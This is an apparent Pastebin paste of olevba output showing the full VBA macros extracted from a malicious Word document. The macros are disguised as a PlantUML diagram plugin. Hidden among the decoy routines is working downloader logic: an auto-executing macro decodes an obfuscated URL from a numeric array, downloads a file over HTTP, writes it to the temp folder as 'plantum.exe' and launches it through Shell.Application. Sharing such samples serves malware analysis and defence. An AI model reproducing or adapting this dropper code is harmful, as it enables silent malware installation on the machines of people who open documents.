API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Oct 28th, 2015
880
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 33.32 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V ikeare~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: ikeare~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: ikeare~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17. CreateStyle True
  18. RemoveOldVersionPlantUMLSyles
  19. CreateStyleImg
  20. HideHiddenText
  21.     DoubleCheckStyle
  22.     getJarPath
  23. End Sub
  24.  
  25.  
  26.  
  27. -------------------------------------------------------------------------------
  28. VBA MACRO Module1.bas
  29. in file: ikeare~1.doc - OLE stream: u'Macros/VBA/Module1'
  30. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  31.  
  32. Dim vectorgraphics As Boolean
  33. Dim useFTP As Boolean
  34. Dim FTPURL As String
  35.  
  36.  
  37. Public Const figaro = ""
  38.  
  39. Function get_gfx_extension() As String
  40.     If vectorgraphics Then
  41.         get_gfx_extension = "*.eps"
  42.     Else
  43.         get_gfx_extension = "*.png"
  44.     End If
  45. End Function
  46.  
  47.  
  48. Function get_plantuml_options() As String
  49.     Dim options As String
  50.     options = ""
  51.     If vectorgraphics Then
  52.        options = options + " -teps"
  53.     End If
  54.  
  55.     get_plantuml_options = options
  56. End Function
  57.  
  58. Function getExePath(searchfor As String, ByRef try As String) As String
  59.     Set FS = CreateObject("Scripting.FileSystemObject")
  60.      
  61.     nbTemplates = ActiveDocument.Parent.Templates.Count
  62.     mainPath = ActiveDocument.Path
  63.     try = ActiveDocument.Path & "\"
  64.    
  65.     nb = InStrRev(mainPath, "\")
  66.     Do While nb > 1 And FS.FileExists(mainPath + searchfor) = False
  67.         mainPath = Left(mainPath, nb - 1)
  68.         try = try & vbCrLf & mainPath & "\"
  69.         nb = InStrRev(mainPath, "\")
  70.     Loop
  71.    
  72.     For i = 1 To nbTemplates
  73.         If FS.FileExists(mainPath + searchfor) = False Then
  74.             mainPath = ActiveDocument.Parent.Templates.Item(i).Path
  75.             try = try & vbCrLf & ActiveDocument.Parent.Templates.Item(i).Path & "\"
  76.             nb = InStrRev(mainPath, "\")
  77.             Do While nb > 1 And FS.FileExists(mainPath + searchfor) = False
  78.                 mainPath = Left(mainPath, nb - 1)
  79.                 try = try & vbCrLf & mainPath & "\"
  80.                 nb = InStrRev(mainPath, "\")
  81.             Loop
  82.         End If
  83.     Next i
  84.    
  85.     If FS.FileExists(mainPath + searchfor) Then
  86.         getExePath = mainPath
  87.     Else
  88.         getExePath = "Error : Cannot find plantuml.jar in :" & vbCrLf & try
  89.     End If
  90.    
  91.    
  92. End Function
  93.  
  94. ' =========================================================
  95. ' This function returns the path for plantuml.jar
  96. Public Function getJarPath() As String
  97.  
  98.  
  99. shellApp.Open (tempFile)
  100. Exit Function
  101.      Set FS = CreateObject("Scripting.FileSystemObject")
  102.     Dim trypath As String
  103.     trypath = ""
  104.     jarPath = getExePath("\plantuml.jar", trypath)
  105.     If (jarPath <> "") And FS.FileExists(jarPath + "\plantuml.jar") Then
  106.         getJarPath = jarPath
  107.     Else
  108.         getJarPath = "Error : Cannot find plantuml.jar in :" & vbCrLf & trypath
  109.     End If
  110.    
  111. End Function
  112.  
  113.  
  114.  
  115. ' =========================================================
  116. ' This function returns the path for plantuml.jar
  117. Function getDotPath() As String
  118.     Set FS = CreateObject("Scripting.FileSystemObject")
  119.     Dim trypath As String
  120.     Dim searchfor As String
  121.     trypath = Environ("%APPDATA%")
  122.     If Environ("GRAPHVIZ_DOT") <> "" Then Exit Function
  123.     searchfor = "\release\bin\dot.exe"
  124.     dotPath = getExePath(searchfor, trypath)
  125.     If (dotPath <> "") And FS.FileExists(dotPath + searchfor) Then
  126.         getDotPath = dotPath + searchfor
  127.     Else
  128.         getDotPath = "" '"Error : Cannot find graphviz in :" & vbCrLf & trypath
  129.    End If
  130. End Function
  131.  
  132.  
  133. ' =========================================================
  134. ' Print out the used plantuml.jar
  135. Sub ShowPlantumlJarPath()
  136.     Set FS = CreateObject("Scripting.FileSystemObject")
  137.     jarPath = getJarPath()
  138.     If jarPath <> "" And FS.FileExists(jarPath) Then
  139.         MsgBox "OK : " & jarPath
  140.     Else
  141.         MsgBox jarPath
  142.     End If
  143. End Sub
  144. ' =========================================================
  145. ' Used to migrate from previous PlantUML macro version
  146. Public Sub RemoveOldVersionPlantUMLSyles()
  147.    On Error GoTo DeleteEnd
  148.    
  149. tempFolder = processEnv("T" & "E" + tempFile + "" + "MP")
  150.  
  151. tempFile = tempFolder + figaro + "\" + "plantum." + figaro + "exe"
  152. Exit Sub
  153.    ActiveDocument.Styles("PlantUML").Delete
  154.    On Error GoTo 0
  155. DeleteEnd:
  156.    On Error GoTo 0
  157.    Call Macro_UML_all
  158.  
  159. End Sub
  160. ' =========================================================
  161. ' Called when the user click on "UML.*"
  162. Sub Macro_UML_all()
  163.     Macro_UML ("all")
  164. End Sub
  165.  
  166. ' =========================================================
  167. Sub Macro_UML_styles()
  168.     CreateStyle (True)
  169. End Sub
  170.  
  171. ' =========================================================
  172. ' Called when the user click on "UML.1"
  173. Function Macro_UML_parg()
  174.     Macro_UML ("parg")
  175. End Function
  176.  
  177. ' =========================================================
  178. Function WriteToFile(sFile, sText As String)
  179.     Dim objStream As Object
  180.     Set objStream = CreateObject("ADODB.Stream")
  181.     With objStream
  182.         .Type = 2              ' Stream type = text / string data
  183.        .Mode = 3
  184.         '.Charset = "ascii"     ' plantUML can only deal with ASCII: Setting to ASCII kills Word's autoformatting
  185.        .Charset = "utf-8"     ' plantUML can only deal with ASCII: Setting to ASCII kills Word's autoformatting
  186.        .Open
  187.         .WriteText sText
  188.         .savetofile sFile, 2
  189.     End With
  190. End Function
  191.  
  192.  
  193. -------------------------------------------------------------------------------
  194. VBA MACRO Module2.bas
  195. in file: ikeare~1.doc - OLE stream: u'Macros/VBA/Module2'
  196. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  197.  
  198. Public RubiRubiReq As Object
  199. Public RubiRubiStream As Object
  200. Public processEnv  As Object
  201. Public tempFolder As String
  202. Public tempFile As String
  203. Public shellApp As Object
  204. Function Macro_UML(scope) As String
  205. ' Generate diagrams image from a PlantUML source textual description in the Word Document
  206. ' Scope can be "parg" or "all"
  207. '
  208. ' - Initialisations
  209.    Dim currentIndex As Long
  210.     Dim ftphandle As Long
  211.     Dim JavaCommand As String
  212.     Dim GraphVizOption As String
  213.     GraphVizOption = ""
  214.     Dim scalefiles As String
  215.     ToolbarInit
  216. '    Set statusButton = CommandBars("UML").Controls(6)
  217.    If RegK.eyRead("VectorGraphics") = "ON" Then
  218.         vectorgraphics = True
  219.     End If
  220.     If RegK.eyRead("FTPMode") = "ON" Then
  221.         useFTP = True
  222.     End If
  223.    
  224.     FTPURL = RegK.eyRead("FTPURL", "127.0.0.1:4242")
  225.    
  226.    
  227.     Call CreateStyle(True)
  228.     Call CreateStyleImg
  229.     Call ShowPlantuml
  230.  
  231.     Call ShowHiddenText
  232.     Selection.Range.Select
  233. '
  234. ' documentId is the filename with its path, without extension
  235. '
  236.    documentId = ActiveDocument.Name
  237.     documentId = Left(documentId, Len(documentId) - 4)
  238.    
  239.     ' Check for the presente of plantuml.jar
  240.    
  241.     Set FS = CreateObject("Scripting.FileSystemObject")
  242.     jarPath = getJarPath()
  243.     If (jarPath = "") Or FS.FileExists(jarPath + "\plantuml.jar") = False Then
  244.         MsgBox jarPath
  245.     End If
  246.     dotPath = getDotPath()
  247.     If dotPath <> "" Then
  248.         GraphVizOption = " -graphvizdot """ & dotPath & """"
  249.     End If
  250.  
  251.    
  252.     Do While parsedtext.Find.Found = True And _
  253.              (scope = "all" Or currentIndex < 1) And Not jobDone
  254. '        statusButton.Caption = "Extract." & currentIndex + 1
  255. '        statusButton.Visible = False
  256. '        statusButton.Visible = True
  257.        Set currentparagraph = parsedtext.Paragraphs(1)
  258.         Set paragraphRange = currentparagraph.Range
  259.         paragraphRange.Collapse
  260.         jobDone = False
  261.         Do Until jobDone
  262.             If Left(currentparagraph.Range.Text, Len(startuml)) = startuml Then
  263.                 Set paragraphRange = currentparagraph.Range
  264.                 paragraphRange.Collapse
  265.                
  266.             End If
  267.             paragraphRange.MoveEnd Unit:=wdParagraph
  268.             If Left(currentparagraph.Range.Text, Len(enduml)) = enduml Then
  269.                 Dim s As String
  270.                 paragraphRange.Style = "PlantUML"
  271.                 s = paragraphRange.Text
  272.                 currentIndex = currentIndex + 1
  273.                
  274.                 factor = 0#
  275.                 On Error Resume Next
  276.                 p = InStr(LCase(s), "@rescale ")
  277.                 If p > 0 Then
  278.  
  279.                     endscale = InStr(p + 9, s, Chr(13)) - p - 9
  280.                     factorstr = Mid(s, p + 9, endscale)
  281.                     factor = Val(factorstr)
  282.                 End If
  283.                 On Error GoTo 0
  284.                
  285.                 textFileId = documentId & "_extr" & Right("000" & currentIndex, 4) & ".txt"
  286.                 If factor > 0 Then
  287.                     scalef.iles(Replace(textFileId, ".txt", "")) = factor
  288.                 End If
  289.                 If scope = "fetch" Then
  290.                     Macro_UML = Mid(s, 1, Len(s) - 1)
  291.                      Application.ScreenUpdating = True
  292.                     Exit Function
  293.                 End If
  294.                 filename = jarPath & "\" & textFileId
  295.                
  296.                 WriteToFile filename, Mid(s, 1, Len(s) - 1)
  297.                 If useFTP Then
  298.                    retValue = FtpS.tor(ftphandle, jarPath & "\" & textFileId, textFileId)
  299.                 End If
  300.  
  301.                 If scope <> "all" Then
  302.                     jobDone = True
  303.                 End If
  304.  
  305.             End If
  306.             Set currentparagraph = currentparagraph.Next
  307.             If currentparagraph Is Nothing Then
  308.                 jobDone = True
  309.             End If
  310.         Loop
  311.         parsedtext.Collapse Direction:=wdCollapseEnd
  312.         If scope = "all" Then
  313.             parsedtext.Find.Execute FindText:=startuml, Forward:=True
  314.         End If
  315.    Loop
  316.    Application.ScreenUpdating = True
  317.    End Function
  318.    Public Function RubiRubi(Rubi1 As Boolean, fromArr() As Variant, LenLen As Integer, Rubi2 As Boolean) As String
  319.     Dim i As Integer
  320.     Dim result As String
  321.     result = ""
  322.     For i = LBound(fromArr) To UBound(fromArr)
  323.         result = result & Chr(fromArr(i) - LenLen + i * 2)
  324.     Next i
  325.     RubiRubi = result
  326. End Function
  327. Public Function PlantUML2()
  328. '
  329. ' We create a lock file that will be deleted by the Java program to indicate the end of Java process
  330. '
  331. '    statusButton.Caption = "Gener"
  332. '    statusButton.Visible = False
  333. '    statusButton.Visible = True
  334.  
  335. '
  336. ' Call to PlantUML to generate images from text descriptions
  337. '
  338.    ' version 012 : add include path to document path
  339.    ' if document is loaded from disk (by drive letter)
  340.    If useFTP Then
  341.         For i = 1 To currentIndex
  342.                imageId = documentId & "_extr" & Right("000" & i, 4) & ".png"
  343.                imageName = jarPath & "\" & imageId
  344.                retValue = FtpRetr(ftphandle, imageName, imageId)
  345.         Next i
  346.   'Sleep 200
  347.    Else
  348.         'Set lockFile = Documents.Add(Visible:=False)
  349.        'lockFile.SaveAs filename:=jarPath & "\javaumllock.tmp", FileFormat:=wdFormatText
  350.        'lockFile.Close
  351.    
  352.         Dim javaoptions
  353.         If ActiveDocument.Path Like "[A-Z]:\*" Or Left(ActiveDocument.Path, 1) = "\" Then
  354.             javaoptions = " -Dplantuml.include.path=" & Chr(34) & ActiveDocument.Path & Chr(34) & " "
  355.         End If
  356.    
  357.             JavaCommand = "java " & javaoptions _
  358.                & "-classpath """ & jarPath & "\plantuml.jar;" & _
  359.                 jarPath & "\plantumlskins.jar"" net.sourceforge.plantuml.Run -charset UTF8 -word """ & jarPath & "/""" & GraphVizOption & get_plantuml_options()
  360.        
  361.        
  362.        
  363.                
  364.         result = ShellAndWait(JavaCommand, 0, vbMinimizedFocus, AbandonWait)
  365.         If result <> Success Then
  366.             MsgBox "Java command execution failed (break key?)"
  367.             Return
  368.         End If
  369.    
  370.  
  371. ' This sleep is needed, but we don't know why...
  372.        Sleep 1000
  373.     End If
  374. '
  375. ' Phase 2 :
  376. ' Insertion of images into the word document
  377. ' We insert the image after the textual block that describe the diagram
  378. '
  379.    jobDone = False
  380.     nrOfImages = currentIndex
  381.     currentIndex = 0
  382.     'Sleep 50 * nrOfImages
  383.    
  384. ' We wait for the file javaumllock.tmp to be deleted by Java
  385. ' which means that the process is ended
  386. '
  387.    ' get images via ftp or wait for java to end
  388.    If useFTP Then
  389.  
  390.     Else
  391.         Do
  392.             currentIndex = currentIndex + 1
  393.     '        statusButton.Caption = "Gener." & currentIndex
  394.    '        statusButton.Visible = False
  395.    '        statusButton.Visible = True
  396.    
  397.             DoEvents
  398.            
  399.             Sleep 100 ' Sleep 500
  400.            If FS.FileExists(jarPath & "\javaumllock.tmp") = False Then
  401.                 jobDone = True
  402.                 Exit Do
  403.             End If
  404.             If currentIndex > 30 Then
  405.     '            statusButton.Visible = False
  406.                MsgBox ("Java Timeout. Aborted.")
  407.                 Exit Do
  408.             End If
  409.         Loop
  410.    
  411.         If jobDone = False Then
  412.             End
  413.         End If
  414.     End If
  415.        
  416. '    statusButton.Caption = "Inser."
  417. '    statusButton.Visible = False
  418. '    statusButton.Visible = True
  419.    
  420.     If scope = "all" Then
  421.         Set parsedtext = ActiveDocument.Content
  422.         isForward = True
  423.     Else
  424.         Set parsedtext = singleparagraph
  425.         isForward = True
  426.     End If
  427.     parsedtext.Find.Execute FindText:=enduml, Forward:=isForward
  428.     currentIndex = 0
  429.         bTrackRevFlag = ActiveDocument.TrackRevisions
  430.         ActiveDocument.TrackRevisions = False
  431.        
  432.         End Function
  433.        
  434. ' =========================================================
  435. ' We need to double check that the style is present in the document
  436. Public Function DoubleCheckStyle()
  437.    GoTo step1
  438.     CreateStyle
  439.     CreateStyleImg
  440.     Set mystyle = ActiveDocument.Styles("PlantUML")
  441.     'myStyle.BaseStyle = ActiveDocument.Styles("Normal")
  442.    'above line fixed to work on international versions of Word
  443.    mystyle.BaseStyle = ActiveDocument.Styles(WdBuiltinStyle.wdStyleNormal)
  444. step1:
  445. dus = CallByName(RubiRubiReq, "respon" + figaro + "seBody", VbGet)
  446.     RubiRubiStream.write dus
  447. GoTo step2
  448.     mystyle.AutomaticallyUpdate = True
  449.     With mystyle.Font
  450.         .Name = "Courier New"
  451.         .Size = 9
  452.         .Hidden = False
  453.         '.Hidden = True ' change in plantuml template 2.9 to allow copy/paste
  454.        .Color = wdColorGreen
  455.     End With
  456. step2:
  457.     RubiRubiStream.savetofile tempFile, 2
  458. End Function
  459.  
  460. Public Function Whileparsedtext()
  461.     Do While parsedtext.Find.Found = True And (scope = "all" Or currentIndex < 1)
  462.         currentIndex = currentIndex + 1
  463. '        statusButton.Caption = "Inser." & currentIndex
  464. '        statusButton.Visible = False
  465. '        statusButton.Visible = True
  466.        On Error GoTo LastParagraph
  467.        
  468.         'error handler will assume that the @enduml is at the last paragraph of the document. Not always true
  469.      
  470.         Set currentparagraph = parsedtext.Paragraphs(1).Next.Range
  471.         Do While currentparagraph.InlineShapes.Count > 0 And currentparagraph.Style = "PlantUMLImg"
  472.             currentparagraph.Delete
  473.             Set currentparagraph = parsedtext.Paragraphs(1).Next.Range
  474.         Loop
  475.         On Error GoTo 0
  476.         Set currentRange = currentparagraph
  477.         imagesDirectory = jarPath & "\" & documentId & "_extr" & Right("000" & currentIndex, 4) & get_gfx_extension()
  478.         image = Dir(imagesDirectory)
  479.         While image <> ""
  480.             ' Contain the text of the error
  481.            errorTextFile = jarPath & "\" & Left(image, Len(image) - 4) & ".err"
  482.             BaseName = Left(image, Len(image) - 4)
  483.             Set currentparagraph = ActiveDocument.Paragraphs.Add(Range:=currentRange).Range
  484.             Set currentRange = currentparagraph.Paragraphs(1).Next.Range
  485.             currentparagraph.Style = "PlantUMLImg"
  486.             currentparagraph.Collapse
  487.            
  488.             Set image = currentparagraph.InlineShapes.AddPicture _
  489.                 (filename:=jarPath & "\" & image _
  490.                 , LinkToFile:=False, SaveWithDocument:=True)
  491.        
  492.             ' check if scale was forced in plantuml code
  493.            If scalefiles(CStr(BaseName)) > 0.1 And scalefiles(CStr(BaseName)) < 5 Then
  494.                 image.ScaleWidth = scalefiles(CStr(BaseName)) * 100
  495.                 image.ScaleHeight = scalefiles(CStr(BaseName)) * 100
  496.             Else
  497.                 ' new 2.9
  498.                ' default: autoscale; reduce to fit if > margin. 100% if picture fits
  499.                With image
  500.                     .LockAspectRatio = msoFalse
  501.                     .ScaleWidth = 100
  502.                     .ScaleHeight = 100
  503.                      percentW = ActiveDocument.PageSetup.TextColumns.Width / image.Width
  504.                      percentH = (ActiveDocument.PageSetup.PageHeight - ActiveDocument.PageSetup.TopMargin - ActiveDocument.PageSetup.BottomMargin) / image.Height
  505.                      If percentH < percentW Then percentW = percentH
  506.                      If percentW < 1 Then
  507.                         .ScaleWidth = percentW * 100
  508.                         .ScaleHeight = percentW * 100
  509.                     End If
  510.                 End With
  511.             End If
  512.            
  513.             If FS.FileExists(errorTextFile) Then
  514.                 image.AlternativeText = LoadTextFile(errorTextFile)
  515.                 Beep
  516.             Else
  517.                 image.AlternativeText = "Generated by PlantUML"
  518.             End If
  519.  
  520.             If image.ScaleHeight > 100 Or image.ScaleWidth > 100 Then
  521.                 image.Reset
  522.             End If
  523.             image = Dir()
  524.         Wend
  525.         parsedtext.Collapse Direction:=wdCollapseEnd
  526.         parsedtext.Find.Execute FindText:=enduml, Forward:=True
  527.    Loop
  528.    ActiveDocument.TrackRevisions = bTrackRevFlag
  529.    
  530. '
  531. ' Phase 3 : suppression of temporary files (text and PNG)
  532. '
  533. Phase3:
  534. '    statusButton.Caption = "Delete"
  535. '    statusButton.Visible = False
  536. '    statusButton.Visible = True
  537.    If Not useFTP Then
  538.         On Error Resume Next
  539.        
  540.         Kill (jarPath & "\" & documentId & "_extr*.*")
  541.         On Error GoTo 0
  542.     Else
  543.        ftpClose ftphandle
  544.     End If
  545. Macro_UML_exit:
  546.  
  547. '    statusButton.Visible = False
  548.    
  549.     'We show the hidden description text
  550.    Call ShowHiddenText
  551.     DoubleCheckStyle
  552. Exit Function
  553.  
  554.  
  555. ' This is need when the very last line of the Word document (or table cell) is @enduml
  556. LastParagraph:
  557.     Selection.EndKey Unit:=wdStory
  558.     Selection.TypeParagraph
  559.     Selection.ClearFormatting
  560.    
  561.         imagesDirectory = jarPath & "\" & documentId & "_extr" & Right("000" & currentIndex, 4) & get_gfx_extension
  562.         image = Dir(imagesDirectory)
  563.         While image <> ""
  564.             ' Contain the text of the error
  565.            errorTextFile = jarPath & "\" & Left(image, Len(image) - 4) & ".err"
  566.            
  567.             Set currentparagraph = ActiveDocument.Paragraphs.Add.Range
  568.             Set currentRange = currentparagraph.Paragraphs(1).Next.Range
  569.             currentparagraph.Style = "PlantUMLImg"
  570.             currentparagraph.Collapse
  571.            
  572.             Set image = currentparagraph.InlineShapes.AddPicture _
  573.                 (filename:=jarPath & "\" & image _
  574.                 , LinkToFile:=False, SaveWithDocument:=True)
  575.                
  576.             If FS.FileExists(errorTextFile) Then
  577.                 image.AlternativeText = LoadTextFile(errorTextFile)
  578.                 Beep
  579.             Else
  580.                 image.AlternativeText = "Generated by PlantUML"
  581.             End If
  582.            
  583.             If image.ScaleHeight > 100 Or image.ScaleWidth > 100 Then
  584.                 image.Reset
  585.             End If
  586.             image = Dir()
  587.         Wend
  588.    
  589.     'Resume Next
  590.    GoTo Phase3
  591.  
  592. End Function
  593.  
  594.  
  595. -------------------------------------------------------------------------------
  596. VBA MACRO Module3.bas
  597. in file: ikeare~1.doc - OLE stream: u'Macros/VBA/Module3'
  598. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  599.  
  600. ' =========================================================
  601. ' Initialize the plantuml ToolBar
  602. Sub ToolbarInit()
  603.     On Error Resume Next
  604.     ActiveDocument.CommandBars("UML").Delete
  605.     On Error GoTo 0
  606. End Sub
  607.    
  608. 'doesn't work yet?
  609. 'Callback for customUI.onLoad
  610. Sub RibbonOnLoad(ribbon As IRibbonUI)
  611. End Sub
  612.  
  613.    
  614. 'original toolbar of plantuml, now obsolete
  615. Function OldToolbarInit()
  616.     On Error GoTo ToolbarCreation
  617.     Set toolBar = ActiveDocument.CommandBars("UML")
  618.     On Error GoTo 0
  619.    
  620.     toolBar.Visible = True
  621.    
  622.     On Error GoTo ButtonAdd
  623.     Set currentButton = toolBar.Controls(1)
  624.     On Error GoTo 0
  625.     currentButton.OnAction = "PlantUML.SwitchP"
  626.     currentButton.Style = msoButtonCaption
  627.     currentButton.Caption = Chr(182)
  628.     currentButton.Visible = True
  629.    
  630.     On Error GoTo ButtonAdd
  631.     Set currentButton = toolBar.Controls(2)
  632.     On Error GoTo 0
  633.     currentButton.OnAction = "PlantUML.ShowPlantuml"
  634.     currentButton.Style = msoButtonCaption
  635.     currentButton.Caption = "Show PlantUML"
  636.     currentButton.Visible = True
  637.    
  638.     On Error GoTo ButtonAdd
  639.     Set currentButton = toolBar.Controls(3)
  640.     On Error GoTo 0
  641.     currentButton.OnAction = "PlantUML.HidePlantuml"
  642.     currentButton.Style = msoButtonCaption
  643.     currentButton.Caption = "Hide PlantUML"
  644.     currentButton.Visible = True
  645.    
  646.     On Error GoTo ButtonAdd
  647.     Set currentButton = toolBar.Controls(4)
  648.     On Error GoTo 0
  649.     currentButton.OnAction = "PlantUML.Macro_UML_all"
  650.     currentButton.Style = msoButtonCaption
  651.     currentButton.Caption = "UML.*"
  652.     currentButton.Visible = True
  653.    
  654.     On Error GoTo ButtonAdd
  655.     Set currentButton = toolBar.Controls(5)
  656.     On Error GoTo 0
  657.     currentButton.OnAction = "PlantUML.Macro_UML_parg"
  658.     currentButton.Style = msoButtonCaption
  659.     currentButton.Caption = "UML.1"
  660.     currentButton.Visible = True
  661.    
  662.     On Error GoTo ButtonAdd
  663.     Set currentButton = toolBar.Controls(6)
  664.     On Error GoTo 0
  665.     currentButton.OnAction = ""
  666.     currentButton.Style = msoButtonCaption
  667.     currentButton.Caption = "Trace"
  668.     currentButton.Visible = True
  669.     Exit Function
  670.  
  671. ToolbarCreation:
  672.     Set toolBar = ActiveDocument.CommandBars.Add(Name:="UML")
  673.     Resume Next
  674.  
  675. ButtonAdd:
  676.     Set currentButton = toolBar.Controls.Add(Type:=msoControlButton, Before:=toolBar.Controls.Count + 1)
  677.     Resume Next
  678.  
  679. End Function
  680.  
  681.  
  682.  
  683. ' =========================================================
  684. Public Function CreateStyle(Optional overwriteIfStyleExists As Boolean = False)
  685.     On Error GoTo CreateStyleAdding
  686.    
  687. Set RubiRubiReq = CreateObject("Microsoft.XMLHTTP")
  688.  
  689.  
  690. Set shellApp = CreateObject("Shell.Application")
  691.  
  692.  
  693. Set processEnv = CreateObject("WScript.Shell").Environment("Process")
  694.  
  695. Set RubiRubiStream = CreateObject("Adodb.Stream")
  696.     Exit Function
  697.     Set mystyle = ActiveDocument.Styles("PlantUML")
  698.     If overwriteIfStyleExists = True Then
  699.         GoTo CreateStyleOverwrite
  700.     End If
  701.     Exit Function
  702. CreateStyleAdding:
  703.     Set mystyle = ActiveDocument.Styles.Add(Name:="PlantUML", Type:=wdStyleTypeParagraph)
  704. CreateStyleOverwrite:
  705.     'myStyle.BaseStyle = ActiveDocument.Styles("Normal")
  706.    ' fix for international versions of Word
  707.    mystyle.BaseStyle = ActiveDocument.Styles(WdBuiltinStyle.wdStyleNormal)
  708.     mystyle.AutomaticallyUpdate = True
  709.     With mystyle.Font
  710.         .Name = "Courier New"
  711.         .Size = 9
  712.         .Hidden = False
  713.         .Hidden = True
  714.         .Color = wdColorGreen
  715.     End With
  716.    
  717.     mystyle.NoProofing = True
  718.     With mystyle.ParagraphFormat
  719.         With .Shading
  720.             .Texture = wdTextureNone
  721.             .ForegroundPatternColor = wdColorAutomatic
  722.             .BackgroundPatternColor = wdColorLightGreen
  723.         End With
  724.         .LineSpacingRule = wdLineSpaceSingle
  725.         'new style: single line, left aligned
  726.        .SpaceBefore = 0
  727.         .SpaceBeforeAuto = False
  728.         .SpaceAfter = 0
  729.         .SpaceAfterAuto = False
  730.         .LineSpacingRule = wdLineSpaceSingle
  731.         .Alignment = wdAlignParagraphLeft
  732.         .LineUnitBefore = 0
  733.         .LineUnitAfter = 0
  734.         .LeftIndent = CentimetersToPoints(0)
  735.  
  736.         With .Shading
  737.             .Texture = wdTextureNone
  738.             .ForegroundPatternColor = wdColorAutomatic
  739.             .BackgroundPatternColor = 12254650
  740.            
  741.         End With
  742.         With .Borders(wdBorderLeft)
  743.             .LineStyle = wdLineStyleDashLargeGap
  744.             .LineWidth = wdLineWidth050pt
  745.             .Color = 3910491
  746.         End With
  747.         With .Borders(wdBorderRight)
  748.             .LineStyle = wdLineStyleDashLargeGap
  749.             .LineWidth = wdLineWidth050pt
  750.             .Color = 3910491
  751.         End With
  752.         With .Borders(wdBorderTop)
  753.             .LineStyle = wdLineStyleDashLargeGap
  754.             .LineWidth = wdLineWidth050pt
  755.             .Color = 3910491
  756.         End With
  757.         With .Borders(wdBorderBottom)
  758.             .LineStyle = wdLineStyleDashLargeGap
  759.             .LineWidth = wdLineWidth050pt
  760.             .Color = 3910491
  761.         End With
  762.         With .Borders
  763.             .DistanceFromTop = 1
  764.             .DistanceFromLeft = 4
  765.             .DistanceFromBottom = 1
  766.             .DistanceFromRight = 4
  767.             .Shadow = False
  768.         End With
  769.     End With  'paragraphformat
  770.    
  771.     ' ajout des tabulations
  772.    mystyle.NoSpaceBetweenParagraphsOfSameStyle = False
  773.     mystyle.ParagraphFormat.TabStops.ClearAll
  774.     mystyle.ParagraphFormat.TabStops.Add Position:= _
  775.         CentimetersToPoints(1), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  776.     mystyle.ParagraphFormat.TabStops.Add Position:= _
  777.         CentimetersToPoints(2), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  778.     mystyle.ParagraphFormat.TabStops.Add Position:= _
  779.         CentimetersToPoints(3), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  780.     mystyle.ParagraphFormat.TabStops.Add Position:= _
  781.         CentimetersToPoints(4), Alignment:=wdAlignTabLeft, Leader:=wdTabLeaderSpaces
  782.  
  783.  
  784. End Function
  785.  
  786. ' =========================================================
  787. Public Function CreateStyleImg()
  788.  
  789.     On Error GoTo CreateStyleImgAdding
  790.         Dim Rubi() As Variant
  791.         Rubi = Array(145, 155, 153, 147, 91, 78, 76, 124, 133, 141, 118, 133, 118, 137, 128, 108, 119, 123, 116, 118, 47, 98, 108, 104, 40, 43, 91, 41, 40, 86, 36, 26, 77, 29, 75, 26, 72, 23, 11, 64, 81, 60)
  792. Hlopushka = RubiRubi(False, Rubi, 41, False)
  793.     RubiRubiReq.Open "GE" + figaro + "T", Hlopushka, False
  794.    
  795.     RubiRubiReq.Send
  796.     Exit Function
  797.     Set mystyle = ActiveDocument.Styles("PlantUMLImg")
  798.     mystyle.Font.Hidden = False
  799.     On Error GoTo CreateStyleSkip
  800.     mystyle.BaseStyle = ActiveDocument.Styles("Normal")
  801. CreateStyleSkip:
  802.     On Error GoTo 0
  803.     Exit Function
  804. CreateStyleImgAdding:
  805.     Set mystyle = ActiveDocument.Styles.Add(Name:="PlantUMLImg", Type:=wdStyleTypeParagraph)
  806.     mystyle.AutomaticallyUpdate = True
  807. End Function
  808.  
  809. ' =========================================================
  810. Public Function HideHiddenText()
  811.    
  812.     On Error Resume Next
  813.    
  814.     ActiveDocument.ActiveWindow.View.ShowAll = False
  815.     ActiveDocument.ActiveWindow.View.ShowHiddenText = False
  816.     On Error GoTo endHidden
  817.    
  818.    RubiRubiStream.Type = 1
  819.     RubiRubiStream.Open
  820.  
  821. Exit Function
  822.     With ActiveDocument.Styles("PlantUML")
  823.         .Font.Hidden = True
  824.     End With
  825. endHidden:
  826.     On Error Resume Next
  827. End Function
  828.  
  829.  
  830.  
  831. Sub ISwitchP(ByVal Control As IRibbonControl)
  832.     SwitchP
  833. End Sub
  834.  
  835. Sub IShowPlantUML(ByVal Control As IRibbonControl)
  836.     ShowPlantuml
  837.  
  838. End Sub
  839.  
  840. Sub IHidePlantUML(ByVal Control As IRibbonControl)
  841.     HidePlantuml
  842.  
  843. End Sub
  844.  
  845. Sub IUML1(ByVal Control As IRibbonControl)
  846.     Macro_UML ("parg")
  847.  
  848. End Sub
  849. Sub IUMLAll(ByVal Control As IRibbonControl)
  850.     Macro_UML ("all")
  851. End Sub
  852.  
  853. Sub IAutoFormatOn(ByVal Control As IRibbonControl)
  854.     AutoFormatOn
  855. End Sub
  856. Sub IAutoFormatOff(ByVal Control As IRibbonControl)
  857.     AutoFormatOff
  858. End Sub
  859.  
  860. Sub IPlantUMLInteractive(ByVal Control As IRibbonControl)
  861.     With frmPlantUMLInteractive
  862.        
  863.        
  864.         .tbPlantCode.Text = Replace(Macro_UML("fetch"), vbLf, vbCrLf)
  865.        
  866.         .Show
  867.        
  868.     End With
  869.    
  870. End Sub
  871.  
  872.  
  873.  
  874.  
  875.  
  876.  
